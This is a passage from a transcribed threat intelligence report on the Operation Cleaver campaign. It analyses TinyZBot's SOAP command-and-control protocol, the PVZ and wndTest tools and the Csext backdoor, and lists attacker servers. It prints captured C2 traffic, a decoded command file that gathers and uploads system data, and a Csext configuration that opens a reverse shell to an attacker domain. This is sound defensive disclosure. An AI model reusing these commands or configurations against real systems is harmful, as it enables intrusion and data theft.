  1959. As part of SOAP communications, a URI is specified. This is internal to the sub-protocol, and does
  1960. not necessarily reflect the URI of the host running the SOAP server (ASMX file). In the case of
  1961. TinyZBot, and many examples for developing SOAP applications, this URI is tempuri.org.
  1962.  
  1963. Since the first version of the SOAP-based command and control protocol was implemented, TinyZBot used
  1964. what is referred to as a “dynamic password”. The result of this is a cryptographically hashed version
  1965. of the server time (which must be obtained through a SOAP query), the TinyZBot’s GUID, and the
  1966. TinyZBot’s AppUsageID (campaign identifier).
  1967.  
  1968. For the command and control examples below, red text represents TCP data sent from the TinyZBot
  1969. infection while blue text represents TCP data sent from the command and control server. The server
  1970. time lookup query invokes the SOAP command GetServerTime.
  1971.  
  1972. POST /checkupdate.asmx HTTP/1.1
  1973. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  1974. Content-Type: text/xml; charset=utf-8
  1975. SOAPAction: “http://tempuri(dot)org/GetServerTime”
  1976. Host: microsoftactiveservices(dot)com
  1977. Content-Length: 291
  1978. Expect: 100-continue
  1979. Connection: Keep-Alive
  1980.  
  1981. HTTP/1.1 100 Continue
  1982. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope
  1983. xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=”http://www.w3.org/2001/
  1984. XMLSchema-instance”
  1985. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”><soap:Body><GetServerTime xmlns=”http://tempuri.
  1986. org/” /></soap:Body></soap:Envelope>
  1987.  
  1988. HTTP/1.1 200 OK
  1989. Cache-Control: private, max-age=0
  1990. Content-Type: text/xml; charset=utf-8
  1991. Server: Microsoft-IIS/7.5
  1992. X-AspNet-Version: 2.0.50727
  1993. X-Powered-By: ASP.NET
  1994. Date: Mon, 06 Oct 2014 13:36:47 GMT
  1995. Content-Length: 392
  1996.  
  1997. [ PG-48 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  1998.  
  1999.  
  2000.  
  2001. [CYLANCE                                                                                  #OPCLEAVER]
  2002.  
  2003. TinyZBot Command and Control Protocol (cont.)
  2004.  
  2005. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope
  2006. xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/”
  2007. xmlns:xsi=”http://www.w3.org/2001/ XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001
  2008. XMLSchema”><soap:Body><GetServerTimeResponse xmlns=”http://
  2009. tempuri.org/”><GetServerTimeResult>2014-10-06T13:36:47.2193601Z</GetServerTimeResult></
  2010. GetServerTimeResponse></soap:Body></soap:Envelope>
  2011.  
  2012. This is the first query done by a running TinyZBot instance, and needs to be done shortly before
  2013. most other queries, in order to update the dynamic password.
  2014.  
  2015. Commands, updates and files to drop and execute are stored as files on the SOAP server, and access
  2016. is restricted by the AppUsageID as well as the bot GUID. This allows for commands to be sent to
  2017. all bots for a campaign as well as individual control. The TinyZBot queries the server in order
  2018. to enumerate all files currently available to it.
  2019.  
  2020. POST /checkupdate.asmx HTTP/1.1
  2021. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  2022. Content-Type: text/xml; charset=utf-8
  2023. SOAPAction: “http://tempuri(dot)org/GetFileList”
  2024. Host: microsoftactiveservices(dot)com
  2025. Content-Length: 425
  2026. Expect: 100-continue
  2027.  
  2028. HTTP/1.1 100 Continue
  2029. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/
  2030. soap/envelope/” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/
  2031. XMLSchema”><soap:Body><GetFileList xmlns=”http://tempuri(dot)org/”><Id>00cf6217-8c7e-4598-
  2032. b155-65ebd949bba9</Id><AppType>XYZCO</AppType><IP /><Pass>abefc81</Pass><Version>BDFF;1.0.0</
  2033. Version></GetFileList></soap:Body></soap:Envelope>
  2034.  
  2035. HTTP/1.1 200 OK Cache-Control: private, max-age=0
  2036. Content-Type: text/xml; charset=utf-8
  2037. Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727
  2038. X-Powered-By: ASP.NET Date: Mon, 06 Oct 2014 13:36:47 GMT
  2039. Content-Length: 1474
  2040.  
  2041. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/
  2042. soap/envelope/”
  2043. xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
  2044. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”><soap:Body><GetFileListResponse xmlns=”http://
  2045. tempuri.org/”>
  2046.  
  2047. [ PG-49 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2048.  
  2049.  
  2050.  
  2051. [CYLANCE                                                                                  #OPCLEAVER]
  2052.  
  2053. TinyZBot Command and Control Protocol (cont.)
  2054.  
  2055. <GetFileListResult><string>[ALL] b93c-49a1-140914084450 [0000000000000000000000000000
  2056. 0000].tmu</string><string>[ALL]  b93c-49a1-140914084612  [0000000000000000000000000000
  2057. 0000].tmu</string><string>[ALL]  b93c-49a1-140914084619  [00000000000000000000000000000
  2058. 000].tmu</string><string>[ALL]  b93c-49a1-140914084628  [00000000000000000000000000000
  2059. 000].tmu</string><string>[ALL]  b93c-49a1-140914084638  [00000000000000000000000000000
  2060. 000].tmu</string><string>[ALL]  b93c-49a1-140914084644  [00000000000000000000000000000
  2061. 000].tmu</string><string>[ALL]  b93c-49a1-140914084659  [000000000000000000000000000000
  2062. 00].tmu</string><string>[ALL]  b93c-49a1-140914084715  [0000000000000000000000000000000
  2063. 0].tmu</string><string>[ALL]  b93c-49a1-140914084732  [00000000000000000000000000000000
  2064. ].tmu</string><string>[ALL]  b93c-49a1-140914084741  [00000000000000000000000000000000].
  2065. tmu</string><string>[ALL]  b93c-49a1-140914090807  [00000000000000000000000000000000].tmu</
  2066. string><string>[ALL]  b93c-49a1-140915103605  [00000000000000000000000000000000].tmu</
  2067. string><string>[ALL]  b93c-49a1-140915103610  [00000000000000000000000000000000].tmu</string></
  2068. GetFileListResult></GetFileListResponse></soap:Body></soap:Envelope>
  2069.  
  2070. In order to download the file and parse for commands to execute, the TinyZBot must request the file.
  2071. The file is downloaded Base64-encoded inside of the SOAP response.
  2072.  
  2073. POST /checkupdate.asmx
  2074. HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol
  2075. 2.0.50727.1433)
  2076. Content-Type: text/xml; charset=utf-8
  2077. SOAPAction: “http://tempuri(dot)org/GetFile”
  2078. Host: microsoftactiveservices(dot)com
  2079. Content-Length: 478
  2080. Expect: 100-continue
  2081.  
  2082. HTTP/1.1 100 Continue
  2083.  
  2084. <?xml version=”1.0” encoding=”utf-8”?>
  2085. <soap:Envelope xmlns:soap=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=”http://www.
  2086. w3.org/2001/XMLSchema-instance”
  2087. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”>
  2088. <soap:Body><GetFile xmlns=”http://tempuri(dot)org/”><Id>00cf6217-8c7e-4598-b155-65ebd949bba9</
  2089. Id><AppType>XYZCO</AppType><IP /><Pass>abefc81</Pass><FileName>[ALL] b93c-49a1-140914084450      
  2090. [00000000000000000000000000000000].tmu</FileName></GetFile></soap:Body></soap:Envelope>
  2091.  
  2092. HTTP/1.1 200 OK
  2093. Cache-Control: private, max-age=0
  2094. Content-Type: text/xml; charset=utf-8
  2095. Server: Microsoft-IIS/7.5
  2096. X-AspNet-Version: 2.0.50727
  2097. X-      Powered-By: ASP.NET Date: Mon, 06 Oct 2014 13:36:47 GMT
  2098. Content-Length: 652
  2099.  
  2100. <?xml version=”1.0” encoding=”utf-8”?><soap:Envelope xmlns:soap=”http://schemas.
  2101. xmlsoap.org/soap/envelope/” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
  2102. xmlns:xsd=”http://www.w3.org/2001/XMLSchema”>
  2103. <soap:Body><GetFileResponse xmlns=”http://tempuri(dot)org/”>
  2104. <GetFileResult>OzIwMTQwOTE0X18wODQ0NTANClJVTkNNRD1jbWQuZXhlLC9DIGlwY29uZmlnIC9hbGwgP
  2105. j4gIltJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dCIgMj4mMQ0KV
  2106. VBMT0FEPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA0KREVMR
  2107. VRFPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA==
  2108. </GetFileResult></GetFileResponse></soap:Body></soap:Envelope>
  2109.  
  2110. [ PG-50 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2111.  
  2112.  
  2113.  
  2114. [CYLANCE                                                                                  #OPCLEAVER]
  2115.  
  2116. TinyZBot Command and Control Protocol (cont.)
  2117.  
  2118. The command file downloaded in this example is as follows:
  2119.  
  2120. ;20140914 084450
  2121. RUNCMD=cmd.exe,/C ipconfig /all >> “[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt”2>&1
  2122. UPLOAD=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
  2123. DELETE=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
  2124.  
  2125. The first line is a timestamp of the command. The TinyZBot command parser ignores it. The RUNCMD
  2126. line requests that cmd.exe be executed, with the command ipconfig /all being redirected to a file
  2127. in a directory designated for files to be uploaded. The UPLOAD command requests that this file
  2128. is then uploaded over SOAP to the command and control server. The DELETE command then requests
  2129. that the file be deleted from the infected system.
  2130.  
  2131. The following is a list of supported commands that TinyZBot responds to:
  2132.  
  2133. COPY REPLACE DELETE UPLOAD FUPLOAD CLEARFILES
  2134. CLEAROUPUTFOLDER SAVECONFIG SAVETOCFGFILE RESTART
  2135. RestartForce KILL DEEPKILL EXIT EXITFORCE
  2136. RUNAVDETECTOR RUNWAIT RUNCMD UCMD GETINFO
  2137. GETSCREENSHOTHQ GETSCREENSHOT CREATEUPLOADLIST FORCERESTART
  2138. FORCEEXIT UNLOADMODULE RELOADMODULE LOADMODULE UNLOADM
  2139. RELOADM REMOVEM UNLOADALL RELOADALL ADDSEC
  2140. REMSEC ADDKV CHGKV REMKV ADDK REMOVEK
  2141.  
  2142.  
  2143. Commands such as GETINFO are often run on newly infected systems, as they decide whether the infection
  2144. has hit the correct target. There are additional SOAP commands, but they will not be covered in
  2145. detail. The following is a list of all the SOAP commands: CheckFileMD5, GetFile, GetFileList,
  2146. GetServerTime, UploadFile.
  2147.  
  2148. Deception
  2149.  
  2150. TinyZBot is commonly installed using some form of deception. Recent versions use the resume-based
  2151. methods reported in the Initial Compromise sections. An additional method was used for earlier
  2152. versions. When early versions of TinyZBot were executed, they opened an image stored in the resource
  2153. section of the executable and copied the malicious TinyZBot executable to the
  2154. %AppData% directory.
  2155.  
  2156. Many of the images identified were of the popular Lebanese singer and actress Haifa Wehbe. The
  2157. backdoor additionally replaced the original malicious executable with an appropriately named image
  2158. file and padded the image file with null bytes in order to mirror the original file size.
  2159.  
  2160. [ PG-51 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2161.  
  2162.  
  2163.  
  2164. [CYLANCE                                                                                  #OPCLEAVER]
  2165.  
  2166. History
  2167.  
  2168. The earliest known version on TinyZBot was compiled on January 27, 2013. This early version had very
  2169. little functionality. It was limited to logging keystroke data, sending emails, and creating a link
  2170. in the user’s startup folder for persistence. Its method of exfiltrating the logged keystrokes relied
  2171. upon a hardcoded email address stored in the binary. The sender email address was
  2172. dyanachear(at)beyondsys.com and emails were destined for testmail_00001(at) yahoo.com. The message
  2173. was intended to look like common Viagra spam from China, but would be sent with the keystroke
  2174. logging data as attachments, as well as system information. The initial version did not provide any
  2175. means of receiving commands and was obfuscated with SmartAssembly. The following iteration compiled
  2176. on March 12, 2013, only contained minor bug fixes.
  2177.  
  2178. The next version was compiled on April 24, 2013. This version starts to look more like an average bot.
  2179. A command and control protocol was established, using HTTP and SOAP for the protocol. The command and
  2180. control server for this version was located at 173.192.144.68/ DefaultWS(dot)asmx. This new command and
  2181. control protocol allowed for the addition of quite a few other features. An update mechanism was added,
  2182. and could be regularly scheduled, so unassisted periodic update checks were automatically performed. The
  2183. SOAP API used a dynamic password mechanism, which required the computation of a simple key in order to
  2184. access certain parts of the API. The email data exfiltration method also underwent modification to be
  2185. activated at a scheduled interval. There were also some changes, which looked to be bug fixes, such as
  2186. limiting the number of times sending an email could fail.
  2187.  
  2188. The next day, April 25, 2013, a new version was compiled which allowed for self-deletion.
  2189.  
  2190. On May 14, 2013, we noticed a change which assisted in the identification of active targets. The AppUsageId
  2191. (at this point named AppType) was an identifier used by this organization in order to differentiate
  2192. between targets infected with TinyZBot, meaning they could effectively run multiple campaigns using
  2193. the same command and control server and know which target was infected. This also allowed for separate
  2194. commands to be supplied to different targets without the need for per-bot commands. At this time, the
  2195. AppUsageId was total0, but later we observed names, which aligned with active targets. The exfiltration
  2196. email address was also changed to TerafficAnalyzer(at)yahoo.com.
  2197.  
  2198. On June 17, 2013, there was an addition that allowed for the loading of configuration data from the
  2199. PE’s resources. At this time, it was limited to the exfiltration email address. This version was not
  2200. obfuscated with SmartAssembly
  2201.  
  2202. [ PG-52 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2203.  
  2204.  
  2205.  
  2206. [CYLANCE                                                                                  #OPCLEAVER]
  2207.  
  2208. History (cont.)
  2209.  
  2210. We do not see a new version of TinyZBot until June 7, 2014. There are quite a few notable improvements,
  2211. but nowhere near enough to indicate consistent development on the project for  a year. SmartAssembly
  2212. was reused again. A method was added to detect what security related software is installed. Avira
  2213. antivirus was specifically targeted and disabled, due to its detection of the new keystroke logger
  2214. module added in this version. This keystroke logger source is publicly available and referred to as
  2215. DeadkeyLogger.
  2216.  
  2217. A new string encryption class is added, but the code was copied and pasted from a Microsoft example.
  2218. The ability to extract Internet Explorer passwords was added. Clipboard monitoring code was added,
  2219. but not invoked. The emailing features were removed, but the classes which previously contained them
  2220. were still present but empty. Many more options were enabled to be loaded from PE resources. The
  2221. ability to add PE resources was added. Another version was compiled on June 7, 2014, with no feature
  2222. difference.
  2223.  
  2224. On June 17, 2014, we see the first instance of Binder_1, which is aptly named, as it is a binder.
  2225. The legitimate application used in this version of Binder_1 was compiled on August 22, 2013, and is
  2226. a self-extracting archive of desktop wallpapers, including an image from the game Mirror’s Edge. The
  2227. TinyZBot included was the version compiled on June 7, 2014.
  2228.  
  2229. The version compiled on June 23, 2014, added functionality which allowed screenshots of the desktop
  2230. to be taken.
  2231.  
  2232. On August 2, 2014, we see another version without SmartAssembly obfuscation. A bug fix is made to the
  2233. keystroke logging method, and clipboard monitoring is enabled.
  2234.  
  2235. Three items were compiled on August 18, 2014. Two of them are TinyZBot binaries, which contain a minor
  2236. key logging bug fix. The third is a new Binder_1 instance, which contains one of the TinyZBot instances
  2237. compiled that day. The legitimate application included in this binder is called Easy_resume_creator and
  2238. is a legitimate application named EasyRésuméCreatorPro. This version targeted a major Saudi Arabian oil
  2239. company.
  2240.  
  2241. From August 23 to August 26, 2014, new versions of TinyZBot were compiled with the AppUsageIds targeting
  2242. major oil and gas companies in Qatar and Kuwait, Ministries of Foreign Affairs in the Persian Gulf,
  2243. and a major airline holding company in UAE. These versions of TinyZBot moved towards a more modular
  2244. architecture where each component was in its own .NET assembly. This was presumably done to limit
  2245. antivirus detection of each individual file as well as allow for dynamic updating of specific modules.
  2246. All of these were included in their own Binder_1 instance, which also dropped Easy_resume_creator.
  2247.  
  2248. [ PG-53 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2249.  
  2250.  
  2251.  
  2252. [CYLANCE                                                                                  #OPCLEAVER]
  2253.  
  2254. History (cont.)
  2255.  
  2256. There also seem to be improved software engineering practices in many locations. FTP upload support
  2257. was added, with hardcoded credentials of ano:1. This FTP upload functionality points to the command
  2258. and control server, and is invoked by a command in the SOAP command and control channel. These
  2259. versions have the capability to install as a service.
  2260.  
  2261. On August 25, 2014, the version compiled on August 18 was submitted to VirusTotal in a ZIP archive
  2262. located at http://dl.doosan-job(dot)com/cv/Easy_Resume_Creator- v2.0.zip. This indicates that TinyZBot
  2263. is not only being installed while impersonating a résumé creation suite, but is also impersonating
  2264. potential employers when distributed.
  2265.  
  2266. On September 9, 2014, a ZIP file containing TinyZBot and a configuration targeting a major US
  2267. university with its AppUsageId was created. This was discovered on an anonymous FTP server in the
  2268. same IP range as dl.doosan-job(dot)com along with other malware.
  2269.  
  2270. From September 11 through September 17, 2014, some TinyZBot components were compiled, along with a
  2271. new dropper. This dropper impersonated a tool to submit a résumé to Teledyne. When executed, the
  2272. user is prompted to enter personal information, and at the end is given a button to submit the
  2273. résumé to Teledyne, although nothing is actually submitted. While the user enters this information,
  2274. their machine is infected with TinyZBot. The AppUsageIds for these versions target a major US-based
  2275. university as well as an Israeli aerospace company. These versions began to include a new method of
  2276. installing as a service. The service runs with the name Network Connectivity Manager.
  2277.  
  2278.  
  2279. Interesting Notes
  2280.  
  2281. TinyZBot, as well as some other tools (Csext, Net Crawler) initially would not run without a command
  2282. line parameter set. This was likely to avoid detonation-based detection engines. This command line
  2283. parameter was opensesemi which is often stored in the application’s code in an obfuscated manner.
  2284. The binders and droppers for TinyZBot provided this command line argument and others when executing.
  2285.  
  2286. TinyZBot uses a dynamic mutex. This was accomplished by combining a static preset prefix with the
  2287. active process ID. This allowed supplemental tools to keep TinyZBot running by enumerating every
  2288. process and checking if the process ID and mutex prefix existed. If no mutex and process pair was
  2289. located, another TinyZBot instance would be started.
  2290.  
  2291. [ PG-54 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2292.  
  2293.  
  2294.  
  2295. [CYLANCE                                                                                  #OPCLEAVER]
  2296.  
  2297. Command and Control Servers
  2298.  
  2299. *       88.150.214.168, United Kingdom, microsoftactiveservices(dot)com
  2300. *       95.211.241.249, Amsterdam, Noord-Holland, Netherlands
  2301. *       88.150.214.166, United Kingdom
  2302. *       173.192.144.68, Seattle, Washington, USA
  2303. *       188.227.180.213, United Kingdom
  2304. *       192.111.145.197, Rochester, New York, USA
  2305.  
  2306.  
  2307. Backdoors
  2308.  
  2309. Multiple backdoors were used by this organization. These are scripts or applications that allowed
  2310. for command or code execution outside of the victim network. Many of their backdoors were web
  2311. applications, added to web servers, so commands can be executed from a browser or client able to
  2312. communicate with them. This group includes the results of the Shell Creator mentioned in the
  2313. Attribution section, as well as ASPX backdoors used by Nesha. A PHP shell was also observed,
  2314. which also included attribution to Nesha in its hashed password.
  2315.  
  2316. An ASPX backdoor named Zh0uSh311 was located on live servers as well as recovered from a staging
  2317. server. This backdoor does not require authentication, and its use appears to be straightforward.
  2318. Its functionality breaks down into three fairly standard components: SQL queries, executing commands,
  2319. and uploading files.
  2320.  
  2321.  
  2322. [EWWW SCREENCAP!]
  2323.  
  2324. Figure 24: The ASPX backdoor named “Zh0uSh3ll”, allowing SQL queries.
  2325.  
  2326. [ PG-55 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2327.  
  2328.  
  2329.  
  2330. [CYLANCE                                                                                  #OPCLEAVER]
  2331.  
  2332.  
  2333. [EWWW SCREENCAP!]
  2334.  
  2335. Figure 25: The ASPX backdoor named “Zh0uSh3ll”, allowing file
  2336.  
  2337. This organization utilized backdoors which masqueraded as varying versions of Notepad. They replace
  2338. the existing Notepad.exe on the infected machine, and when run they call out to a remote server
  2339. and execute any shell code returned by the remote server. There will be a detailed analysis of these
  2340. backdoors posted to Cylance’s blog in the future.
  2341.  
  2342.  
  2343. PVZ
  2344.  
  2345. PVZ is a name for a set of executables used together to create a botnet. The name PVZ was assigned
  2346. by us as this is one of the few tools this organization has not named themselves.
  2347.  
  2348. [ PG-56 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2349.  
  2350.  
  2351.  
  2352. [CYLANCE                                                                                  #OPCLEAVER]
  2353.  
  2354. PVZ (cont.)
  2355.  
  2356. The components are as follows:
  2357.  
  2358. *       PVZ-In
  2359. *       PVZ-Out
  2360. *       Syn Flooder
  2361. *       LoggerModule
  2362. *       XYNTService
  2363. *       Jasus
  2364.  
  2365. XYNTService was not developed by the Cleaver team, but instead is a publicly available project which
  2366. executes an executable as a service.
  2367.  
  2368.  
  2369. PVZ-In
  2370.  
  2371. The purpose of PVZ-In is to communicate with a command and control server. Communication is primarily
  2372. unidirectional, as little information is provided from the bot to its command and control server. The
  2373. known command and control server is located at http://kundenpflege.
  2374. menrad(dot)de/js/jquery/default.aspx and the command and control protocol only uses
  2375. HTTP. The commands as well as infected computer information are transferred in the Content-Disposition
  2376. HTTP header, making the traffic easy to pass over as benign.
  2377.  
  2378.  
  2379. When a command is received from the server, the results are stored in a central location on disk that
  2380. the PVZ tools utilize. Command functionality is limited to executing supplied commands, downloading
  2381. and executing executables as well as self-updating.
  2382.  
  2383. The debug file path for PVZ-In is:
  2384.  
  2385.  
  2386. C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\
  2387. Release\BotManager.pdb
  2388.  
  2389. PVZ-In has been observed using the file name ossisvc.exe.
  2390.  
  2391.  
  2392. PVZ-Out
  2393.  
  2394. PVZ-Out is the other half of the command and control channel, primarily uploading results of commands
  2395. and keystroke logging data to a remote server. The known command and control server for PVZ-Out is
  2396. located at http://www.gesunddurchsjahr(dot)de/tor/default.aspx. Much like PVZ-In, this command and
  2397. control channel communicates with the Content-Disposition HTTP header, but for file data, POST
  2398. data is supplied.
  2399.  
  2400. [ PG-57 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2401.  
  2402.  
  2403.  
  2404. [CYLANCE                                                                                  #OPCLEAVER]
  2405.  
  2406.  
  2407. Data uploaded is often compressed, which can make it more difficult to detect the exfiltration of
  2408. sensitive information.
  2409.  
  2410. The debug file path for PVZ-Out is:
  2411.  
  2412.  
  2413. C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\ Release\SendModule.pdb
  2414.  
  2415. PVZ-Out has been observed with the file name osppsvc.exe.
  2416.  
  2417.  
  2418. SYN Flooder
  2419.  
  2420. SYN Flooder is a simple network based denial of service tool. It is a command line utility capable of
  2421. being invoked by PVZ-In. Targeting information is supplied via command line parameters.
  2422. The debug file path for SYN Flooder is:
  2423.  
  2424.  
  2425. C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\ Release\socket-test.pdb
  2426.  
  2427. SYN Flooder has been observed using the name ossysvc.exe.
  2428.  
  2429.  
  2430. Logger Module
  2431.  
  2432. Logger Module observes the user’s actions and records them to a file. The recorded actions include
  2433. mouse clicks, active windows, keypresses, as well as clipboard data. The resulting log is written
  2434. out to a location where PVZ-Out can exfiltrate it to its command and control server. Logger Module
  2435. has been observed using the name ospcsvc.exe.
  2436.  
  2437. The following command and control servers for Logger Module have been observed:
  2438.  
  2439.  
  2440. 212.87.154.14, Baden-Wurttemberg, Germany, kundenpflege.menrad(dot)de
  2441. 212.87.154.12, Baden-Wurttemberg, Germany, www.gesunddurchsjahr(dot)de
  2442.  
  2443. wndTest
  2444.  
  2445. WndTest is the evolution of the PVZ tool chain into a single executable. The tool chain is minimized
  2446. down to a command and control communications, keystroke logging, and clipboard monitoring. The
  2447. command and control still supports upgrading, downloading, and executing of applications, as well
  2448. as executing batch scripts. WndTest installs as a service and has been observed attempting to
  2449. impersonate Adobe Report Service. WndTest starts using PHP servers for its command and control server,
  2450. some of which are listed as defaced sites.
  2451.  
  2452. [ PG-58 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2453.  
  2454.  
  2455.  
  2456. [CYLANCE                                                                                  #OPCLEAVER]
  2457.  
  2458.  
  2459. We have seen wndTest communicate with the following servers:
  2460.  
  2461.  
  2462. *       209.208.97.44, Orlando, Florida, USA, www.lat(dot)am
  2463. *       23.238.17.181, Tulsa, Oklahoma, USA, regulatorfix(dot)com
  2464. *       209.208.97.44, Orlando, Florida, USA, www.asiess(dot)com
  2465. *       198.50.100.210, Quebec, Canada, halon(dot)com.br
  2466. *       207.182.142.68, Columbus, Ohio, USA
  2467. *       95.211.191.247, Amsterdam, Noord-Holland, Netherlands
  2468.  
  2469.  
  2470. Csext
  2471.  
  2472. Csext is a backdoor application developed in C# which runs as a service. Its primary functionality
  2473. is based on commands supplied by its configuration file. The configuration file is able to store
  2474. specific commands, which are intended to run at particular times. A recovered configuration is as
  2475. follows:
  2476.  
  2477.  
  2478. domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3
  2479. %%
  2480. {0}\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\windows\system32\cmd.
  2481. exe ,taskkill.exe$$/F /PID {pid},00:29,00:35
  2482. %%
  2483. ##
  2484.  
  2485. This configuration executes zhCat to connect back to srv01.microsoftwindowsupdate(dot)net
  2486. (a deceptive domain owned by this group with falsified Whois data attributing to Microsoft Investor
  2487. Relations) with XORed communication using the HTTP protocol on TCP port 443. This zhCat instance is
  2488. running cmd.exe, effectively making it a reverse connecting shell. This command  runs at 00:29 in the
  2489. morning, and is killed by taskkill at 00:35. This gives the attackers a predictable method to regain
  2490. access to a compromised network if they ever lose access.
  2491.  
  2492. Csext also has email functionality similar to TinyZBot. This email functionality is used to
  2493. exfiltrate the results of commands from the command file which can also include requests like
  2494. gathering user information.
  2495.  
  2496. We have seen Csext configured to communicate with the following servers:
  2497.  
  2498.  
  2499. *       78.47.102.90, Germany, srv01.microsoftwindowsupdate(dot)net
  2500. *       174.36.195.158, Washington D.C, USA, srv01.microsoftupdateserver(dot)net
  2501.  
  2502.  
  2503. [ PG-59 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2504.  
  2505.  
  2506.  
  2507. [CYLANCE                                                                                  #OPCLEAVER]
  2508.  
  2509. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  2510. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  2511. %#%%%%%%%%@@@%%%@@#%%%%%%%%             MITIGATION           @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
  2512. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  2513. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  2514. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  2515. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  2516. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  2517. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  2518. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  2519. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  2520. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  2521. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  2522. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  2523. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  2524. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  2525. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  2526. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  2527. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  2528. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  2529. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  2530. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
